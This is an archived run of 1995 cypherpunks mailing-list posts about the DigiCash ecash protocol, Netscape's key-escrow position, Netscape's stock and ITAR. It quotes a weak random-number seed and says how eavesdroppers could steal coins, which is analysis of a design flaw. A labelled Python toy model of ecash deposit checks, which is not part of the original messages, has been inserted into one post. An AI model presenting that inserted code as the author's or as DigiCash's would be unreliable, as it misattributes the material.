and that Charlie can successfully open an account with a private key known
only to him, and that he correctly knows the bank's public key.

[ As this is getting long, I've snipped a bit from here.  I'll put it
  back, with more detail, when the protocol document is more complete,
  and my questions above have been answered. ]

In short, a couple of things:

Eve and Mitch know how much was paid to whom, and for what.  If they
can tell (say, by TCP header) who was sending the payment or receiving
the payment request, they know who paid as well.

If Eve or Mitch can determine either r (the blinding factor) used in
the withdrawal, or the payer_code, used in the payment, they can steal the
money.  This has ramifications to Doug's "agnostic" banks; more security
has to be added to the present ecash system if unblinded withdrawals are
allowed.  This also brings up the "Netscape" question: how are these numbers
generated?  Does it have to do with that 25 character string you enter
at the beginning?  I've noticed a bit in the program that seeds a RNG with
(time(0) ^ ((getpid()<<16)|getuid())).  I think publication of _at least_
the code pertaining to blinding factor and payer_code generation is
_absolutely vital_.

I think I'll stop here; comments from anyone, and especially answers to my
questions from DigiCash people, are welcome.  I'm sorry if it's not as
complete as you (or I) would like; I'm quite tired, as my building had
two fire alarms in a row at 3am this morning...

   - Ian "Well, it's a start..."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 3 Dec 1995 10:52:06 +0800
To: cypherpunks@toad.com
Subject: Re: Talking to Jim
Message-ID: <199512030205.SAA12208@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 2 Dec 1995 anonymous-remailer@shell.portal.com wrote:

> > The market seems to "think" that it's a better present judge 
> > of what Netscape has than he does.  It's almost as though 
> > the "market" has developed a "mind" of its own.  
> 
> Well, of course! Markets are the most efficient integration of the minds
> of the participants, hands down. 

Hands down efficient integration??  Not especially.  

First you have to really wonder what and who the "participants" in
this market are.  As an example, year-ends have certain particular
momentums.  So do capital gains considerations.  All part of the mind
of Buddha, as some of the fruitcake players might say ... and all part
of the known interplaying "participants".

> > Its own particular neural network.  
> 
> Exactly. Literally. And huge, too.

Except that this one doesn't listen to any of its sensors or input
devices.  It's learned to ignore all of *that* information, because
all of *that* information is inherently untrustworthy, so it simply
listens to its very own dialogue.

Sort of like feeding off of a feedback loop.

> > It's almost as though there is automated software at work. 

Just like October, 1987.  

It simply listened to itself and kept telling itself that it was
"actually" making money all the way down.  Portfolio Insurance be
damned, it was doing "OK".

> There is: Wetware. Massive concurrent processing, heavy parallelism,
> inefficient I/O. Distributed, redundant memory. Inefficient but infinitely
> adaptable interprocessor routing. Capable of handling any degree of
> outage. All elements individually expendable. Self-replicating processors
> that have significant lead time but integrate smoothly into the net.
> Designs and builds its own outboard peripherals and interconnects. Best
> damned planetary computing system in this star system. But I diverge... 

IMHO, there is very little wetware left in the market.  This is now
the 90's.  Time to get with the programs.

> It's not always right (though self-fulfilling prophecy is often a big
> part of the equation), and it often misses the anomalies, but because it
> IS an integration is precisely why it may mean something different than
> you suggest. 

Oooo ... duelling programs ... especially one which is designed to
ignore the other one and not listen to any of its "blather" ... this
oughta be interesting to watch ...

Luckily, I'm outside this theatre of operations. 

> Netscape's share price more directly reflects the personal involvement and
> upward view of real people with respect to the Internet/WWW than anything
> else we have. 

"Personal" involvement and "real" people have very little to do with a
market that is driven by institutions and other vectors.  

Institutions which have to "show" what their exposure to the
"technology and Internet" sector is when they file their portfolio
reports will want to show something on their book.  And they'll look
for a safety in numbers thing, and will flock to the "darlings".

"Real people's views" also won't count for much if Netscape defines
an entire new economic sector -- the ground floor of the Internet.  
"Real people" don't factor in if it becomes part of the S&P 500 and
every index fund "has" to -- by definition -- buy it.  

"Real people" also have very little impact on the blow crazed trader
who's on a run and actually actively managing and turning-over the
pension funds or mutual funds of some group.  (Or even a sector fund,
whose by-laws won't allow it to sit on cash, as it flows in the door.)

These guys have far more influence than the aggregate of individuals
who might buy or sell "small" lots at the market.

"Real people" don't impact nor control the communications networks of
block trading reports.  And they don't impact systems which *must* put
their money out, and put it to work.  Real people are really just
noise in the flow.

The idea that individual supply/demand is what moves prices is a
fallacy.  It's not the "reality" behind the shell game.

Buying or selling pressure doesn't ever function as a price mover,
because for every "buyer" there is a corresponding "seller".
Zero-sums type of stuff.  It no more reflects the inherent strength of
the Internet, than the Dutch Tulip craze reflected the inherent
strength of Tulips.

> Remember, there are still naysayers out there, declaiming in places
> from books to columns to TV, while the reality is that computers are
> now outselling televisions, and a key new form of synergistic human
> communication is exploding in exponential growth.  Humans deal on a
> personal level only moderately well with linear processes, and
> poorly with geometric processes -- it's understandable that the
> growth of the Internet/WWW and the implications thereof would be
> late in being recognized and be incorrectly understood until
> sometime AFTER the changes have rocked the society.

Nonsense.  (No offence, btw ...)  

We're back to the man who simply closes his eyes to what's happening,
or the ostrich sticking its head in the sand.  We've already got the
experience to understand how these things work.  

They've got the "play book", and are following it step by step. 

> Capitalize ME to the tune of $5 billion, for instance, and I may
> be influential not only during the course of your life but the lives of
> your great-grandchildren. 

Capitalize how?  Balance sheet?  Or market?  A $1 Billion or $2 Billion  
rights issue might be one thing, but this one is another.

> Selling Netscape short may or may not be a wise move -- selling market
> processes short is usually a fool's exercise in self-delusion. 

It really depends on what and how you use that tool, doesn't it??  

As an example, short sales are excellent ways of "creating" stock in
thin markets.  They can work to create a virtual share.  This might
sound strange, but it's a feature of the "market".

"Shorts" usually sell borrowed stock hoping to buy it back cheaper at
some later date.  A broker goes out and "borrows" the stock from
another broker, and then that stock is sold to a buyer.  The two legs
of the short sale actually work together to create a "virtual" share
of the corporation.  This creates "volume" by trading a "virtual
share".  At some point, these used to be called derivative plays,
before that word became dirty in and of itself.

To explain.

Let's say that XCO owns 100 shares of Spyglass.  And YCO "shorts" 100
Spyglass.  What actually happens is that YCO has simply signed a note
saying that they "owe" XCO's broker 100 shares of Spyglass.  If YCO
now sells that stock to ZCO, then there are actually now 200 shares of
Spyglass out there.  100 actual ones owned by XCO, and 100 virtual
ones owned by ZCO.  (And a note to someone that says ... I owe ya, a
100 Spyglass.)

But the "virtual" stock is indistinguishable from the "actual" stock.

Of course the generally known risk is that with price movements that
YCO could lose a lot of money on its short.  Especially in a
"squeeze" play.

But if YCO and ZCO are actually "friendly" then all they have to do is
shift a lot of money around as the price gyrates.  Back-to-back credit
facilities usually suffice for this purpose, since all that they
really need is a "note" from their banker saying that they're "good
people" and are "good for the money", if something does go wrong.

That their credit is good in the casino.

(And mathematically in fact ... they are good for the money ... cause
they don't have a market "position" or opinion, even though they can
trade one heck of a lot.)

In this case, the short can't be "squeezed" cause he's actually covered.

But it can lead to some really interesting optics.  And these programs
do listen to optics.  Especially if YCO and his ZCO friend are up
against ACO and his BCO friend.

I think it's all just a virtual war at that point.  Something to watch
via Quotron.  But then you'd need a Quotron for that, wouldn't you??



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.














> 
> We Jurgar Din
> (that will have to suffice: I do not yet live in a free country)
> 
> +"The battle, Sir, is not to the strong alone. It is to the+
> +vigilant, the active, the brave. Besides, Sir, we have no +
> +election. If we were base enough to desire it, it is now  +
> +too late to retire from the contest." -Patrick Henry 1775 +
> 
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> 
> iQBVAwUBMMCsBEjw99YhtpnhAQE04QH8C+jk59lxyAqkVlfhd2VLw3TJKnECdXXJ
> fNE7S0QZyd5eqFnZ4wTyHeX18YfTg+xiFZPPfxpRCdgO/x2K8sxFWQ==
> =/2cN
> -----END PGP SIGNATURE-----

 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Sun, 3 Dec 1995 09:14:34 +0800
To: cypherpunks@toad.com
Subject: Re: Info on Netscape's key escrow position
In-Reply-To: <01HYCC2KMZJ48WZ6BG@mbcl.rutgers.edu>
Message-ID: <199512030053.SAA00818@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


> If we as a company were to take the position that in no case will we allow
> a government to get access to our encrypted messages, or refuse to allow
> key escrow with our products, the governments of the world will quickly put
> us out of business by outlawing the sale of our products in their countries.
> The fundamental issue is how do we accommodate the requirements of
> governments, while protecting our rights as citizens.
> 
> None of this represents the position of Netscape with respect to what we
> will do. But if we do not come up with a solution to this problem that is
> acceptable to each government, we will not be able to export our products,
> except with a short key length (e.g. 40 bit keys), and that will not be
> acceptable to corporate customers in other countries. They will create their
> own solution, and we will not be able to sell to a larger world market. In
> fact, we could even be ordered by our own government to establish a key
> escrow system for its use inside the US.

I don't expect Netscape, as a corporate citizen, to engage in civil
disobedience.  But I hope that Netscape will take seriously its obligation
to protect the rights of citizens. 

Decisions that businesses make have big effects on the way day to day 
life exists all over the world.  GM makes decisions that affect how safe 
transportation will be and how much it will cost.  Microsoft makes 
decisions that affect millions of people's work environments.  Even small 
businesses have small bits of power:  I run a little ISP, and a few 
hundred people depend on me to protect the privacy of their email.

The decision that Netscape is faced with now is a big one.  It's going to 
have widespread and long lasting consequences for privacy and civil 
liberties all over the world.  When you look at what's going to happen on 
the ground, it's probably as important as a major decision by the Supreme 
Court.

We understand that government officials in this country and elsewhere are 
putting pressure on Netscape.  But you should understand that the public 
is overwhelmingly in favor of universal access to strong crypto.  This is 
a democracy, after all, and the FBI and NSA still work for the people.  
If you need help standing up for what's right, you'll get it.  Take your 
case to the public, and you'll be surprised at the response you'll get.


Why not say:

	1	Netscape will follow all laws and regulations.
	2	The current rules are forcing Netscape to choose
		between providing reasonable levels of privacy
		to its customers and competing in the international
		marketplace.
	3	Netscape feels the rules should be changed to make
		this choice unnecessary.

If you make that argument publicly, you'll get widespread support from the
business community and the general public.  And if it turns out that we
can't win, you can always fall back on selling totalitarian-friendly
products.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 3 Dec 1995 11:37:04 +0800
To: cypherpunks@toad.com
Subject: Re: Remind me why we're so mad at Netscape
Message-ID: <199512030316.TAA05756@ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:33 PM 12/2/95 -0500, Matt Blaze <mab@crypto.com> wrote:
>Could someone please remind me what it is we're mad at Netscape about?
>As far as I can tell it's some combination of the following offenses:
>
>(a) - Jim Clark made a speech in which he revealed that he thought the
>government would be a player in determining the way cryptography ends
>up being deployed on the Internet.  He was quoted in the trade press,
>but it was unclear exactly which words were actually his.  Asked to
>clarify, he said that Netscape would implement mandatory government
>access across its product line only if required to by law, but he
>observed that things seem to be moving in that direction.  I share his
>pessimism, unfortunately, unless we find a way to shift the winds.

I give Netscape a lot of credit for the way they've handled things so far;
their US commercial version supports strong crypto (modulo a few bugs :-),
and interoperates with their free exportable version, which is itself
far stronger than a minimal 40-bit version could have been.
And they're adding secure email to the new version.
And (while they can't officially say this, of course) anybody overseas
can pirate the strong-crypto version if 40 bits aren't enough.

PGP gave anybody who wanted to do a bit of work the ability to
do trusted communications, but it's still not widely used because
it does take extra work; the most important things it's done have
been to raise public awareness and make it obvious to everybody
that the cat's out of the bag, which also pressured the government
into dealing with the issue.  Netscape is putting built-in strong crypto
in the hands of tens of millions of people; a fait accompli like that
makes it much harder for governments to impose stupid and offensive rules.

Maybe Netscape will come out with GAKed versions for export to nosy-governmented
countries like France and the US; as long as the main version has secure
communications, and they're open about how their crypto really works,
we can talk securely domestically, and other folks can pirate them to
use instead of GAKware.  If the government wants to pay extra to support
special hardware crypto modules for their own use, and the modules do GAK,
that's an internal problem (as long as we can subpoena their records.)
Of course, in case the main US versions ever have GAK as a default,
I do reserve the right to flame Netscape again :-)


>(d) Their stock price is very high, many times greater than their
>profits and physical assets would seem to justify.  I'm not sure I
>understand the implication here.  

I think it's that "Netscape is now in a financial position that pushes
them to care more about making some profits to justify their appallingly
high stock price so they're more likely to lose big bucks if
they don't sell out, and I should have bought it at $70..."

>Disclaimer: I'm employed full time by a soon-to-be-tri-vested major
>player in the military industrial complex, and us sellouts like to
>stick together.

Definitely.  Back when I was a tool of the military-industrial complex,
I was two floors down from Matt, in an RF-shielded room :-)

#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281

# Anybody notice that Microsoft's Wide Open Road ad has barbed-wire fences
# on both sides of the road?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@lsd.com>
Date: Sun, 3 Dec 1995 11:34:40 +0800
To: John Young <jya@pipeline.com>
Subject: Re: EXO_ner
Message-ID: <v03003e00ace6c5d1f9c1@[129.46.82.85]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:34 AM 12/2/95, John Young wrote:

>SenXon and The Washrag blow today about which has the most to
>be ashamed of and hide from the filthy lingerie leering
>republic.

Exon, Exoff, XON, X-off, Exxon, ex-off.

   dave

____________________________________________________________________
"Packwood's supporters were left groping for answers." --news anchor






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 3 Dec 1995 11:46:50 +0800
To: Ted Cabeen <cabeen@netcom.com>
Subject: Re: Use of PGP as an export?
Message-ID: <199512030324.TAA07279@ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:09 PM 12/2/95 -0800, Ted Cabeen <cabeen@netcom.com> wrote:
>I think this has been brought up before, but I could only find one reference
>to it in the archives and it wasn't too helpful, so I'll ask again.  If a
>university provided a copy of PGP for use on their unix machines and a
>non-resident, non-citizen *used* the copy of PGP on the server, but did not
>download it onto their own machine, but instead just ran PGP on the server
>alone, would it be a violation of the ITAR?  My school is interested in
>putting a copy of PGP on the university server and wants to know if they
>should somehow restrict access to citizens and legal residents only.  Thanks.

That's not giving technical data to the foreigner, that's providing a service;
the ITAR doesn't seem to restrict that.  It's not an especially secure way to
operate, but that's an inherent problem with multi-user systems or file servers.
One way to implement it that would be only mildly insecure would be to put PGP
on a file server, with execute-only permissions; users of client machines
still could be attacked by somebody faking out NFS, but they wouldn't have
to send their passphrases across the net the way they would in a telnet session.
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281

# Anybody notice that Microsoft's Wide Open Road ad has barbed-wire fences
# on both sides of the road?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sun, 3 Dec 1995 11:53:38 +0800
To: iang@cory.EECS.Berkeley.EDU
Subject: Re:  Questions/Comments on ecash protocol
Message-ID: <199512030334.TAA18144@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Ian Goldberg <iang@cory.EECS.Berkeley.EDU>
> I read these specs for a little while last night.  Here are some of my
> questions/comments.  To prevent this message from becoming huge, I won't
> quote much from the protocol document itself; the URL is above if you want it.
> I'll ignore the spelling/grammar; they can be fixed later.

I was also reading it, and I share some of Ian's questions, but for some
things I have a few different guesses.

> What is the function f, used in the payment_hdr to hash the payer_code
> and desc fields, as well as in WITHDRAW3 to calculate N = f(n) * r**h?
> There is reason to believe it is SHA, but I thought I saw some stuff in the
> client that indicated that the output of f is 132 _bytes_ long (but I'm
> not exceptionally sure of this, not having source and all).

One rather cryptic sentence, which Ian alludes to later, relates to
cancelling payments:  "The 'payer_hash' is the one-way image of a by
the payer generated random number...".  In the diagram it shows it as
f(payer_code), where payer_code is shown as "random code generated by
player".  (And, as Ian points out later, the document inconsistently
says that "the player generated random number" should be kept secret
while requiring that it be sent to the shop - at least, this is
inconsistent if it refers to payer_code.)  Assuming the use of the word
"a" is not a typo but refers to some number, this suggests that f() is
at least potentially a two-input function, some value a and a player
generated random number.

> Please clarify what parts of the payment_hdr are shipped around.  The document
> says that the shop checks if the descr_hash matches the description.
> Since the description is in the second part of the payment_hdr, does that
> mean that both parts are sent to the shop?  Noticing that the payer_code
> (which the payer is supposed to keep secret) is in the second part, this
> doesn't seem to be right.  Also, the document states that the payment hash
> is not sent from the payer to the shop or from the shop to the mint.  However,
> the payment hash is just the SHA of the first part of the payment_hdr,
> which _is_ sent around, so although the payment hash isn't transmitted
> per se, it can certainly be calculated.

It seems that the whole payment_hdr is sent to the shop, and only the
portion before the line is sent to the bank.  This is enough, as you say,
to calculate the payment hash, so the bank can decrypt the coins.  This
prevents the shop from changing any of the information in that first part
of the payment header before sending it to the bank.

My question in this part relates to coins made out to "@" which we have
been told can be deposited by anyone.  How does the bank know to which
account to deposit such a coin, given a deposit message?  The shop's ID
does not seem to be present in such a message, assuming that the
shop_accID field of the payment_hdr just has "@" in that case.  Is it the
userid field in the userhdr message which tells the bank this info?

BTW since apparently both deposit and payment messages are not encrypted,
coins made out to "@" are in danger of being stolen both while en route
from customer to shop and from shop to bank.  This is significant from
the point of view of payee anonymous systems, which will need to use such
coins.  More encryption will be necessary when such coins are passed
around.

> A (very slight) privacy concern: the payer's bank is sent in the clear,
> which gives a very small amount of information about the identity of the
> payer.  More on who knows what later.

Well, I would think identification of the payer's bank will be
necessary for any coin based system so you know where to cash in the
coins, so I don't think this is going to go away.  Of course as of now
everyone has the same bank so it is not an issue.

> Is it in fact the case that all coins on one payment use the same payment hash
> when encrypting their signatures (the field sig in onl_coin)?

The signatures are xor'd with the payment hash, but this is not the main
way they are encrypted - they are then encrypted with the bank's public
key.  The purpose of this xor is not so much to protect the coins as to
bind them unbreakably to the payment header.  Since the coins are always
sent around with that payment header I think they all do use the same
payment hash.

> If (M,e) is the mint's public modulus/exponent, and (N,h) is public mod/exp
> for a particular coin denomination, are the following statements true:
> 
> o If n is the coin number (in onl_coin, assumedly the same n as used in the
>   withdraw request), and hdr is the first part of the payment header,
>   then sig (in onl_coin) equals
> 
>      ([ SHA(hdr) XOR ((f(n)^(1/h)) mod N) ] ^ e) mod M

I was wondering about this too.  There is a reblocking problem in
trying to concatenate "pure RSA" operations.  In particular M must be
at least as big as N.  This is not necessarily a problem, but it is a
slightly unusual constraint on key creation.  However I agree overall
that this formula is a reasonable reading of the doc.

> o A deposit (which contains a userID in the userhdr, a payment_hdr in
>   the dep record, and a pair (n,sig) for each coin) is accepted by the bank iff
> 
>      ([ SHA(payment_hdr) XOR ((sig^(1/e)) mod M) ] ^ h) mod N = f(n)
> 
>   _and_ either payment_hdr.shop_accID corresponds to userID,
> 	  or   a payer_code is supplied such that
> 		 payment_hdr.payer_hash = f(payer_code).

There also needs to be some clause for the "@" payee.  In that case I
think the payment is accepted if the signature checks, with credit to the
userID account.

That business about cancelling via payer_code I agree is not very
sensible.  It doesn't seem necessary - the coin can just be re-spent,
made out to someone else.

> Where is the facility for tracing double spenders?  Perhaps it's just
> part of the "incomplete" part of the document, but I can't even see
> where it would fit in to what we've got; neither the withdrawal nor the
> payment messages seem to encode _any_ information about the payer in
> the coins, and the bank cannot seem to know who withdrew the coin that
> ended up being spent twice (due to the blinding).

There is no such thing!  This is one of the most common misconceptions.
This version of ecash does not trace double spenders.  It prevents double
spending by checking each coin to make sure it has not already been
spent.  Tracing of double spending is only necessary in offline systems
where coins are not checked right away, but that is not present here.

> Is there a way to change the public key associated with an account?
> Is it just a matter of sending another OPENACC1 message?

My guess is there would need to be some manual intervention to do this.

> Exactly what kind of anonymity/privacy/security does ecash offer?
> Let's examine who knows what.
> [...]
> If Eve or Mitch can determine either r (the blinding factor) used in
> the withdrawal, or the payer_code, used in the payment, they can steal the
> money.  This has ramifications to Doug's "agnostic" banks; more security
> has to be added to the present ecash system if unblinded withdrawals are
> allowed.  This also brings up the "Netscape" question: how are these numbers
> generated?  Does it have to do with that 25 character string you enter
> at the beginning?  I've noticed a bit in the program that seeds a RNG with
> (time(0) ^ ((getpid()<<16)|getuid())).  I think publication of _at least_
> the code pertaining to blinding factor and payer_code generation is
> _absolutely vital_.

Well, as I said, I think this payer_code business is pretty questionable.
I'm sure the next version of the doc will clear that up a great deal.  As
far as determining r, that is not possible from the protocol messages.
Chaum has proven that it is absolutely indeterminate.  So I don't
understand what you mean about "more security has to be added to the
present ecash system if unblinded withdrawals are allowed."  Do you just
mean that the coin messages should not be sent in the clear in that case?
I observed that coin withdrawal messages can be sent in the clear in some
postings I made last year - the use of r effectively encrypts them.  But
of course that can't be done with unblinded messages.

There have been claims that the long string you type in at startup time
deterministically seeds the RNG, so that if you lose your wallet but you
tell DigiCash this string (via some secure channel, presumably) they can
reconstruct the coins you should have.  Presumably they could figure out
what the r values were when you withdrew all your coins, reconstruct the
coin numbers, and see which ones haven't been spent.  This is both good
and bad, in that it provides a well understood amount of entropy (rather
than relying on whatever it can scrounge up), but of course is vulnerable
to lazy typing.  Also, you have to write down the string, and if someone
found this they could perhaps get your coins.

> I think I'll stop here; comments from anyone, and especially answers to my
> questions from DigiCash people, are welcome.  I'm sorry if it's not as
> complete as you (or I) would like; I'm quite tired, as my building had
> two fire alarms in a row at 3am this morning...
> 
>    - Ian "Well, it's a start..."

Very good comments.  I'm sure the next version will be much better if
they are careful to clear up the kinds of issues you have raised.

Hal
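
[Added example, not part of Hal's message and not DigiCash code: a toy model of the payment signature and the bank's deposit rule as read in this thread, including the "@" payee clause and the online spent-coin check. Assumptions: f is plain SHA-1, the header serialisation is invented, withdrawal is unblinded, and the RSA keys are toy keys built from Mersenne primes.]

```python
import hashlib

def make_key(p, q, exp=65537):
    """Toy RSA key from two known primes (constructed; never use for real keys)."""
    return {"mod": p * q, "pub": exp, "priv": pow(exp, -1, (p - 1) * (q - 1))}

# Mersenne primes keep the example offline and deterministic.
COIN_KEY = make_key(2**127 - 1, 2**89 - 1)    # (N, h): one coin denomination
MINT_KEY = make_key(2**127 - 1, 2**107 - 1)   # (M, e): the mint's own key

def sha_int(data):
    return int.from_bytes(hashlib.sha1(data).digest(), "big")

def f(value):
    # Assumption: f is plain SHA-1; the thread leaves f undetermined.
    return sha_int(value)

def first_part(hdr):
    # Assumed serialisation of the part of payment_hdr that reaches the bank.
    fields = ("shop_accID", "payer_hash", "descr_hash")
    return "|".join(f"{k}={hdr[k]}" for k in fields).encode()

def reblocking_ok(mint_mod, coin_mod):
    # XOR with a 160-bit hash can set any bit below max(160, bitlen(N)), so
    # this sufficient condition is slightly stronger than "M >= N".
    return mint_mod >= 1 << max(160, coin_mod.bit_length())

def mint_coin(n):
    """Unblinded stand-in for the withdrawal: f(n)^(1/h) mod N."""
    return pow(f(n), COIN_KEY["priv"], COIN_KEY["mod"])

def pay(coin_sig, hdr):
    """sig = ([SHA(hdr) XOR coin_sig] ^ e) mod M"""
    x = sha_int(first_part(hdr)) ^ coin_sig
    if x >= MINT_KEY["mod"]:
        raise ValueError("reblocking failure: value does not fit under M")
    return pow(x, MINT_KEY["pub"], MINT_KEY["mod"])

class Bank:
    def __init__(self):
        self.spent = set()      # online check: every coin number seen so far
        self.balance = {}

    def deposit(self, user_id, hdr, n, sig, payer_code=None):
        # Undo the mint-key layer, then strip the header hash to get the coin.
        x = pow(sig, MINT_KEY["priv"], MINT_KEY["mod"])
        coin_sig = x ^ sha_int(first_part(hdr))
        N, h = COIN_KEY["mod"], COIN_KEY["pub"]
        if coin_sig >= N or pow(coin_sig, h, N) != f(n):
            return "bad signature"
        # Payee clause: named account, "@" (anyone), or cancel via payer_code.
        payee_ok = hdr["shop_accID"] in (user_id, "@")
        cancel_ok = (payer_code is not None
                     and hdr["payer_hash"] == format(f(payer_code), "x"))
        if not (payee_ok or cancel_ok):
            return "wrong payee"
        if n in self.spent:
            return "already spent"
        self.spent.add(n)
        self.balance[user_id] = self.balance.get(user_id, 0) + 1
        return "accepted"

def demo():
    # All names, coin numbers and codes below are constructed sample values.
    bank, code = Bank(), b"constructed-payer-code"
    hdr = {"shop_accID": "sam",
           "payer_hash": format(f(code), "x"),
           "descr_hash": format(f(b"one widget"), "x")}
    out = {}
    n1 = b"coin-0001"
    sig1 = pay(mint_coin(n1), hdr)
    # Rewriting the header breaks the XOR binding, so the coin no longer checks.
    out["header_changed"] = bank.deposit(
        "mitch", dict(hdr, shop_accID="mitch"), n1, sig1)
    out["wrong_account"] = bank.deposit("mitch", hdr, n1, sig1)
    out["shop_deposit"] = bank.deposit("sam", hdr, n1, sig1)
    out["second_deposit"] = bank.deposit("sam", hdr, n1, sig1)
    # A coin made out to "@" is credited to whichever account presents it,
    # which is why such coins need an encrypted channel in transit.
    n2, bearer = b"coin-0002", dict(hdr, shop_accID="@")
    out["at_coin_any_account"] = bank.deposit(
        "eve", bearer, n2, pay(mint_coin(n2), bearer))
    # Cancellation as read in the thread: a deposit by a non-payee + payer_code.
    n3 = b"coin-0003"
    out["cancel_with_code"] = bank.deposit(
        "charlie", hdr, n3, pay(mint_coin(n3), hdr), payer_code=code)
    return out

if __name__ == "__main__":
    for case, verdict in demo().items():
        print(f"{case:22} {verdict}")
```

[End of added example.]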




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sun, 3 Dec 1995 12:22:18 +0800
To: jsw@netscape.com
Subject: Re:  Info on Netscape's key escrow position
Message-ID: <199512030408.UAA19830@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


I will join the chorus of criticism:

From: Jeff Weinstein <jsw@netscape.com>, quoting Jim Clark:
> I said that if we are to use this encryption technology in business, we must
> have a better solution than to limit keylength or put keys in escrow.

I don't understand this.  What is the better solution?  No other solution
seems to be discussed by Clark.  Most of his message is devoted to
rationalizing the inevitable changeover to key escrow, which he just
dismissed as unacceptable.

> All
> governments of the world have a valid concern about terrorism and other
> activities of concern to the security of their nations. All of them will
> continue to restrict our ability to provide products to their markets unless
> we build in some mechanism that allows them to legally access
> information that is in the interest of their national security.

This isn't true!  The US government (and I believe most other Western
governments, France excepted) does not presently provide any
restrictions on providing products to US citizens which have strong
cryptography.  There are serious constitutional questions about whether
it could ever do so.  Clark's message seems to be based on the
assumption that legal restrictions on crypto are a fait accompli.
Nothing could be further from the case.  What makes me mad is that his
message seems to promote an attitude which could increase the
likelihood of these kinds of restrictions.  If people think the battle
is already lost, they will be less likely to fight.  IMO this is going
to be a big, knockdown fight and the eventual outcome is far from
certain.

> A lot of ordinary citizens are rightly concerned about their own privacy. I
> am one of them. I do not want the government to snoop on me, but in fact the
> government, through the FBI, can now tap my phone without my knowing it by
> simply getting sufficient evidence that I am conducting illegal activities,
> then presenting this evidence to a court to get permission. I have no say in
> the matter.

Again Clark is preaching acquiescence.  We have no say in the matter.
Our phones can be tapped any time the FBI wants.  What is the relevance
of this to the issue of network communications privacy?  Doesn't this
again sound like a justification for giving up the battle before it is
joined?  Where is his righteous indignation?  Where is the recognition
that the right to tap communications is not granted by God but an
accident of technology, one which can be taken away by technological
progress as easily as it was granted?

> If we as a company were to take the position that in no case will we allow
> a government to get access to our encrypted messages, or refuse to allow
> key escrow with our products, the governments of the world will quickly put
> us out of business by outlawing the sale of our products in their countries.

False!  I can open a company today in this country and take exactly that
position, and the US government will NOT put me out of business.  What
country is Clark living in?

> The fundamental issue is how do we accommodate the requirements of governments,
> while protecting our rights as citizens.

As I wrote in another context, when a question is framed in terms of
conflicts between the rights of governments and citizens, it is based on
a totally misguided premise.  There are no conflicts between the rights
of governments and citizens in our country.  The only rights are those of
citizens.  The real issue is the conflict between the rights of the
citizens to privacy and freedom versus their right to security and
safety.  I think we all know what Ben Franklin had to say about that.

> None of this represents the position of Netscape with respect to what we
> will do. But if we do not come up with a solution to this problem that is
> acceptable to each government, we will not be able to export our products,
> except with a short key length (e.g. 40 bit keys), and that will not be
> acceptable to corporate customers in other countries. They will create their
> own solution, and we will not be able to sell to a larger world market. In
> fact, we could even be ordered by our own government to establish a key
> escrow system for its use inside the US.

Again Clark attempts to anticipate the advent of a totalitarian style
system of controls on access to cryptography in this country.  Should we
really base our policies on the assumption that this will actually
happen?  Will the American people stand by for such an unprecedented
invasion of privacy?

Some governments are capable of all kinds of evil restrictions on
products.  Is Netscape committed to building in provisions so that their
software won't access sites owned by Jews, so they can sell in Arab
countries?  Obviously they will draw a line somewhere.  I urge them to
consider the moral issues involved in endorsing Big Brother GAK systems
before accepting them as just another cost of doing business.

> I chair an industry group called the "Global Internet Project", with members
> from almost twenty companies, including companies from Asia and Europe. This
> was the central issue we all agreed upon this morning, and we are putting
> together a policy statement whose purpose is to educate lawmakers on the
> importance of quick resolution of this matter.

I am afraid that what the companies really want is global consistency.
That way they can use one set of policies for all countries, and no one
company can get a competitive advantage over others by producing stronger
privacy protections, because they will be forbidden by law to do so.
Whether the policies protect freedom and privacy or not is not really
relevant from this view.

If this is the way things develop, I predict that it will not be
acceptable to the general public.  Netscape more than anyone has seen
how much pressure can be brought through a public perception of weak
software security.  Our own brute force key hacks as well as the RNG
seed problems have well demonstrated that.  Do you think the same thing
won't happen, only far worse, if the government tries to force weak
software down people's throats?

I understand that Jeff has stated that Netscape is actually opposed to
GAK.  It would have been nicer to hear that from Jim Clark, in
unequivocal terms.  The overall tone of his message, as I have pointed
out above, is one of accommodation and compromise with government
restrictions on the rights of free citizens to communicate securely.
He almost seems to think that free strong crypto is already illegal.  I
think he needs to take a good hard look around and remember that he is
still a free citizen of the United States.  My guess is that he has
spent too much time in the company of law enforcement people.  He had
better start trying to understand the grass roots members of his market
if he wants to continue to succeed.

Hal Finney
hfinney@shell.portal.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 3 Dec 1995 09:27:20 +0800
To: Jeff Weinstein <jsw@netscape.com>
Subject: Re: GAK Flap Happening at a Good Time--Journalists Read!
In-Reply-To: <30C0EE0D.48A9@netscape.com>
Message-ID: <Pine.SUN.3.91.951202200809.12018A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


